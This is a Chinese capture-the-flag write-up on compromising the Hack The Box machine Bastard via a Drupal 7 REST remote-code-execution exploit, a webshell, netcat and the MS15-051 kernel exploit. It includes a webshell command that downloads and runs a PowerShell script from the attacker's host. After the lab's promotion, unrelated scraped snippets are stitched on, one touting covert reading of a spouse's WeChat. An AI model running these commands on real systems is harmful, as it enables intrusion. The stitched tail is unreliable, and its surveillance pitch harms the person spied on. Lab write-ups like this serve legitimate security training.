Ms08067安全实验
这次挑战的是 HTB 的第7台靶机:Bastard
技能收获:
PHP Unserilaize
CMS Version Identify
Windows privilege escalation :Sherlock
Bastard IP:10.10.10.9
Kali IP:10.10.14.23
发现开启了80(IIS),访问之
看起来是drupal cms,访问 robots.txt ,发现版本变更文件
版本:Drupal 7.54
searchsploit drupal 7.x
该版本存在 rce ,编辑 exploit
该exploit会攻击由服务扩展创建的REST端点,我们只需要找出REST端点的名称即可利用该漏洞。
通过目录枚举,我们发现 endpoint 为 /rest,用其替换exploit
没有反应,挂上 burpsuite 看看
设置 exp 的target为 burp 的监听端口
依然没回应,那应该是缺少php包,未成功发送
检查发现,Kali缺少 php-curl 包,安装好成功返回响应并写入 shell.php
利用 session.json 可以伪造会话,成功登录
已知目标是 x64 的系统,我们上传 nc.exe
下载地址:https://eternallybored.org/misc/netcat/
给 exp 添加一个文件上传功能,也可以使用 *** b文件共享,使用上传
Sherlock是一个在Windows下用于本地提权的PowerShell脚本
http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile -
提示 ms15-051 , 利用之
提权程序下载地址:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip
上传并运行
建立 nc 会话
至此完成
Drupal 7.x RCE 漏洞分析 附EXP:
https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/
<br>
MS08067实验室官网:www.ms08067.com
公众号:"?Ms08067安全实验室"
Ms08067安全实验室目前开放知识星球:?WEB安全攻防,内网安全攻防,Python安全攻防,KALI?Linux安全攻防,二进制逆向入门
最后期待各位小伙伴的加入!
本文导读目录: 1、请问一下黑客帝国123的详细剧情解说。 2、《SCI谜案集(第一部)》耳雅的txt全集下载地址 3、皇室战争黑客破解下载 4、黑客帝国4讲的是什么故事 5、找黑客帝...
2月26日,沛县敬安镇党委副书记、镇长罗启培同志因积劳成疾、突发疾病,不幸殉职在战“疫”一线,年仅42岁。 从1月24日以来,罗启培同志始终坚守在疫情防控工作第一线,既当指挥员又当战斗员,每天调...
深田先生发了一条推特说“先生什么都能教给你喔”,于是谈论底下变成了大型网课讨教问题现场, 有汽车问题、有机械问题、另有棋局, 深田先生看到回复之后,连忙注释不是这个意思,不外并不影响人人学习的兴致...
新浪科技讯 6月26日,万网就23日晚msn.com.cn和google.cn域名解析异常事件表示,这是一起有组织有预谋的黑客攻击活动,目前万网已经向公安机关报案。中国互联网络信息中心(CNNIC)的...
生活中家庭需要信任,需要稳定,但是在某种特殊情况之下,就需要了解对方的行为,微信是一个比较大众化的社交软件,很多人的秘密都存在于微信当中。所以想知道对方的行为,就可以看一看对方的微信。如何同时接收老公...
dns是什么意思(DNS是什么,修改几个数字就能提升网速)关于修改DNS来提升网速的说法,大家有多少人听说过。传说中只要改一串数字马上就能提升网速。到底有没有这么神奇?原来又是什么呢? 今天就跟大家...